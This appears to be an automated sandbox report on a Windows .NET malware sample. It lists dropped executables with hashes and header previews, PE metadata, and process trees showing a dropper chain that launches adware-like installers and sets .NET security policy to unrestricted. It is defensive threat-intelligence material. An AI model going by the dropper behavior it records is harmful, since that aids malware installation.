                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^.................P...........^.......p....@...................................#...@......@...................@....... ..6....p...F............#.P....................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....F...p...F..................@..@....................................@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:true
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Roaming\30601988b56f78c9.53290271_102\fpman.dat
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):10
                                                              Entropy (8bit):2.321928094887362
                                                              Encrypted:false
                                                              SSDEEP:3:KUWcn:KUWcn
                                                              MD5:DB58E8966CCA23A36BA5F71BCBCDBD26
                                                              SHA1:9686A47BA4E3B52E7757E4B8C2951B71D65038EF
                                                              SHA-256:E58AFDCAF3F8CE74B86F2DB346CFC00E87490626D8D8777B0FF3EF44F4DC6B8A
                                                              SHA-512:92869CAD71B5E547AA5F87D3124B03AA0B005427A9D2FFEB53B4B55A26B1EC7EA9357AEDB403442E9FE78BF101EE8822AD6364B6E7BA5BAF4C185906B96AD596
                                                              Malicious:false
                                                              Preview: 1613350506
                                                              C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll
                                                              Process:C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):5.400289434075511
                                                              Encrypted:false
                                                              SSDEEP:384:7FOpPzWbCj4oNg+Pg+R+cpNwfheIi8crwvuDbrqtrfcIT6:gRjaFcaIQAr
                                                              MD5:EF0E47D95754B86B573084177B441765
                                                              SHA1:2BDAC0CF18BEC45B12752C5E647C187C1A55FE88
                                                              SHA-256:89963ED6259B809F83D4285D793F12D11514A54AA9BF1E95C6009CAA485FE1CB
                                                              SHA-512:1074D23540147F2DB5FB50AE462E1D02C2E6984AA374C8CDEBEED23CED6FFCFECCAEED010E570EC9C411CAAACA85B85AF11176C761C3FBDD4031A562F41471CA
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J)`...........!.........^......g........@......................................................................0F..D....A..P.......h.......................t....................................................@...............................text....-.......................... ..`.rdata..t....@.......2..............@..@.data....<...P.......:..............@....rsrc...h............>..............@..@.reloc..`............P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.new
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):442
                                                              Entropy (8bit):3.2141702621458994
                                                              Encrypted:false
                                                              SSDEEP:12:AKtPMsK+w6vgXmQHJkcL5nQa1Q2cL5BKhS6:vqr+vvgJGcLWb2cLb
                                                              MD5:D43F2D1F09069D8ABC90BFCB43B6CF0A
                                                              SHA1:8EC889C8E755CD396E8E8D226BDC61C7467B448B
                                                              SHA-256:BC0F9B175D0E97A041CCFC53C885546C832DDF59BDBE828B74B557B72761B245
                                                              SHA-512:33F549F7C2A6BA3DBC0AABAE97508A412D0E1EC94A73A4EA602812DE4134246C6532F887AD865C02477AD844E5E204AEF427A686908D257EDE6A4F849CB1937D
                                                              Malicious:false
                                                              Preview: ..............f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.B.1.S.2.0.6.C.R.D.5./.m.u.l.t.i.t.i.m.e.r...e.x.e...C.o.n.f.i.g...........P.o.l.i.c.y.S.t.a.t.e.m.e.n.t....v.e.r.s.i.o.n...1....P.e.r.m.i.s.s.i.o.n.S.e.t....c.l.a.s.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...P.e.r.m.i.s.s.i.o.n.S.e.t....v.e.r.s.i.o.n...1....U.n.r.e.s.t.r.i.c.t.e.d...t.r.u.e................................................,..........
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):21504
                                                              Entropy (8bit):5.26115349679037
                                                              Encrypted:false
                                                              SSDEEP:384:tOsttJHqI5HvkQcbuHBxnaTlqoUfzWShtFVa7IAdcXdPC3W:8sttdqIJvkQc5TAfiSfFeCC3W
                                                              MD5:85A4C66DAAFB24BC8CE4CE991E65056A
                                                              SHA1:474765C94426CAE2BCBEA59B5484B409CEF97E92
                                                              SHA-256:E6B7845F4100C9DE2B426B501DCE098767FD845AABF35A3F808447494601C353
                                                              SHA-512:D7B9EC2563DDDE646539101D0C1782779424E33BB9F313536993AFC1197BD5B4C81FF35FC8F658A6D76F1B899B601FFDC8D21E60BD46FFCB396CA6CA1D2CEDCC
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*...............0..H...........e... ........@.. ....................................@.................................xe..O...................................\e............................................... ............... ..H............text...PF... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................e......H...........X7...........................................................0..........~....o....s....z&..*.................(....r...p*.0..[........'...(....rW..p(.......+....o.....'...(....r{..p(..... .....,....o......&..r...p(......&..*.........HH..........WW.......s!...%.}0....."...s....(...+,.s....z*...0...........o......&..*.................0...................o.......&...*..................6..o.........*.(.........*2.s....(....*v.(......r...p~....o....(....*2.{....o....*..
                                                              C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):902271
                                                              Entropy (8bit):7.972060876188639
                                                              Encrypted:false
                                                              SSDEEP:24576:4yIEamFBLxha8gP8AEQ4x2dx9zf3iBhrq08Kj:4yMwbgkAEIdx9zf3iBhZTj
                                                              MD5:725F35103362F3F1410216F5ED785A1F
                                                              SHA1:F8971D3A0B17401142BBE27B09A75D0880158027
                                                              SHA-256:012BF7109847ECDA82D27EAC841B18D5294704D0DFE88517842E596E4004FD55
                                                              SHA-512:5A9739AFDEDF18AA4FDF6895BCEE44855C5189E54D3E74A4B1EA79FBCB95A8195A25E8A8B9ED66D0DA91BA462FE20D4BFADBE73468EEF5F22D1292325F6EBE0F
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F...................@..........................P............@......@..............................|.... ...,..........................................................................................................CODE................................ ..`DATA....P...........................@...BSS......................................idata..|...........................@....tls.....................................rdata..............................@..P.reloc.. ...........................@..P.rsrc....,... ...,..................@..P.............P......................@..P........................................................................................................................................
                                                              C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.new
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):442
                                                              Entropy (8bit):3.2141702621458994
                                                              Encrypted:false
                                                              SSDEEP:12:AKtPMsK+w6vgXmQHJkcL5nQa1Q2cL5BKhS6:vqr+vvgJGcLWb2cLb
                                                              MD5:D43F2D1F09069D8ABC90BFCB43B6CF0A
                                                              SHA1:8EC889C8E755CD396E8E8D226BDC61C7467B448B
                                                              SHA-256:BC0F9B175D0E97A041CCFC53C885546C832DDF59BDBE828B74B557B72761B245
                                                              SHA-512:33F549F7C2A6BA3DBC0AABAE97508A412D0E1EC94A73A4EA602812DE4134246C6532F887AD865C02477AD844E5E204AEF427A686908D257EDE6A4F849CB1937D
                                                              Malicious:false
                                                              Preview: ..............f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.B.1.S.2.0.6.C.R.D.5./.m.u.l.t.i.t.i.m.e.r...e.x.e...C.o.n.f.i.g...........P.o.l.i.c.y.S.t.a.t.e.m.e.n.t....v.e.r.s.i.o.n...1....P.e.r.m.i.s.s.i.o.n.S.e.t....c.l.a.s.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...P.e.r.m.i.s.s.i.o.n.S.e.t....v.e.r.s.i.o.n...1....U.n.r.e.s.t.r.i.c.t.e.d...t.r.u.e................................................,..........
                                                              C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.new
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):442
                                                              Entropy (8bit):3.2141702621458994
                                                              Encrypted:false
                                                              SSDEEP:12:AKtPMsK+w6vgXmQHJkcL5nQa1Q2cL5BKhS6:vqr+vvgJGcLWb2cLb
                                                              MD5:D43F2D1F09069D8ABC90BFCB43B6CF0A
                                                              SHA1:8EC889C8E755CD396E8E8D226BDC61C7467B448B
                                                              SHA-256:BC0F9B175D0E97A041CCFC53C885546C832DDF59BDBE828B74B557B72761B245
                                                              SHA-512:33F549F7C2A6BA3DBC0AABAE97508A412D0E1EC94A73A4EA602812DE4134246C6532F887AD865C02477AD844E5E204AEF427A686908D257EDE6A4F849CB1937D
                                                              Malicious:false
                                                              Preview: ..............f.i.l.e.:./././.C.:./.U.s.e.r.s./.j.o.n.e.s./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.B.1.S.2.0.6.C.R.D.5./.m.u.l.t.i.t.i.m.e.r...e.x.e...C.o.n.f.i.g...........P.o.l.i.c.y.S.t.a.t.e.m.e.n.t....v.e.r.s.i.o.n...1....P.e.r.m.i.s.s.i.o.n.S.e.t....c.l.a.s.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...P.e.r.m.i.s.s.i.o.n.S.e.t....v.e.r.s.i.o.n...1....U.n.r.e.s.t.r.i.c.t.e.d...t.r.u.e................................................,..........

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):6.040314358960337
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File size:242688
                                                              MD5:cf35edde149e46ee5dcafa4151dd4a81
                                                              SHA1:bd920d23e20dd55fce50c1a4cb6294a65d3fd5d9
                                                              SHA256:576c0f0c427bc26f4f32211bb46a7430085cc5dda994f3c1829921d41236cb09
                                                              SHA512:600e506edcb5b3423f5cd8a7a13138737bab4f639b6d8836093ca069934ac2292b66b3f519de99a8411b7f4a550fb9fe2b6059279cee1dff13f22b2190958dba
                                                              SSDEEP:3072:BYVN7yIYmDm4Rt79Iv7yXc5O4QjLP+ZF:+LWIw4Rt79uIerKP+Z
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.)`............................~.... ........@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:70c8b8e8e8b2e470

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x40f57e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x60291460 [Sun Feb 14 12:15:28 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xf5240x57.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x2d8e0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xd5840xd600False0.814507885514data7.45568156237IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x100000x2d8e00x2da00False0.265705265411data5.35558893309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x3e0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x102b00x5909PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                              RT_ICON0x15bbc0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                              RT_ICON0x263e40x94a8data
                                                              RT_ICON0x2f88c0x5488data
                                                              RT_ICON0x34d140x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16318463, next used block 4294909696
                                                              RT_ICON0x38f3c0x25a8data
                                                              RT_ICON0x3b4e40x10a8data
                                                              RT_ICON0x3c58c0x988data
                                                              RT_ICON0x3cf140x468GLS_BINARY_LSB_FIRST
                                                              RT_GROUP_ICON0x3d37c0x84data
                                                              RT_VERSION0x3d4000x32cdata
                                                              RT_MANIFEST0x3d72c0x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Version Infos

                                                              DescriptionData
                                                              Translation0x0000 0x04b0
                                                              LegalCopyrightCopyright 2020
                                                              Assembly Version6.3.0.0
                                                              InternalNameBarraNikLik.exe
                                                              FileVersion6.6.2.8
                                                              CompanyName
                                                              LegalTrademarks
                                                              Comments
                                                              ProductNameBarraNikLik
                                                              ProductVersion6.6.2.8
                                                              FileDescriptionBarraNikLik
                                                              OriginalFilenameBarraNikLik.exe

                                                              Network Behavior

                                                              No network behavior found

                                                              Code Manipulations

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: svchost.exe PID: 616 Parent PID: 568

                                                              General

                                                              Start time:00:55:00
                                                              Start date:15/02/2021
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                              Imagebase:0x7ff6eb840000
                                                              File size:51288 bytes
                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe PID: 3496 Parent PID: 5816

                                                              General

                                                              Start time:00:55:00
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe'
                                                              Imagebase:0x880000
                                                              File size:242688 bytes
                                                              MD5 hash:CF35EDDE149E46EE5DCAFA4151DD4A81
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: multitimer.exe PID: 1692 Parent PID: 3496

                                                              General

                                                              Start time:00:55:03
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102
                                                              Imagebase:0x470000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 28%, ReversingLabs
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: multitimer.exe PID: 3524 Parent PID: 1692

                                                              General

                                                              Start time:00:55:12
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
                                                              Imagebase:0x60000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: multitimer.exe PID: 6644 Parent PID: 3524

                                                              General

                                                              Start time:00:55:18
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
                                                              Imagebase:0xa60000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: svchost.exe PID: 7120 Parent PID: 568

                                                              General

                                                              Start time:00:55:24
                                                              Start date:15/02/2021
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                              Imagebase:0x7ff6eb840000
                                                              File size:51288 bytes
                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: multitimer.exe PID: 1844 Parent PID: 3424

                                                              General

                                                              Start time:00:55:27
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5
                                                              Imagebase:0xe10000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: multitimer.exe PID: 204 Parent PID: 1844

                                                              General

                                                              Start time:00:55:36
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5
                                                              Imagebase:0x560000
                                                              File size:523264 bytes
                                                              MD5 hash:E252EF40FF9D0A528918215DB75A8EB9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: svchost.exe PID: 6744 Parent PID: 568

                                                              General

                                                              Start time:00:55:38
                                                              Start date:15/02/2021
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                              Imagebase:0x7ff6eb840000
                                                              File size:51288 bytes
                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Chronological Activities

                                                              Analysis Process: safebits.exe PID: 5576 Parent PID: 6644

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451
                                                              Imagebase:0x400000
                                                              File size:1188864 bytes
                                                              MD5 hash:7504A339516D6AB6F35C55CD96810040
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: 2mqvpn30gyk.exe PID: 6768 Parent PID: 6644

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8
                                                              Imagebase:0x260000
                                                              File size:994304 bytes
                                                              MD5 hash:A0B220137332876ABC6DD8D91F2DD363
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: tpwlxkeo40z.exe PID: 6420 Parent PID: 6644

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams
                                                              Imagebase:0x3a0000
                                                              File size:472064 bytes
                                                              MD5 hash:83BD1D79670EF5335E6533AE8285AB22
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: AwesomePoolE1.exe PID: 768 Parent PID: 6644

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe'
                                                              Imagebase:0x650000
                                                              File size:78336 bytes
                                                              MD5 hash:0E5F029EB6ECABF1E593E12211887506
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Chronological Activities

                                                              Analysis Process: vkfgkd5pxm1.exe PID: 1548 Parent PID: 6644

                                                              General

                                                              Start time:00:55:39
                                                              Start date:15/02/2021
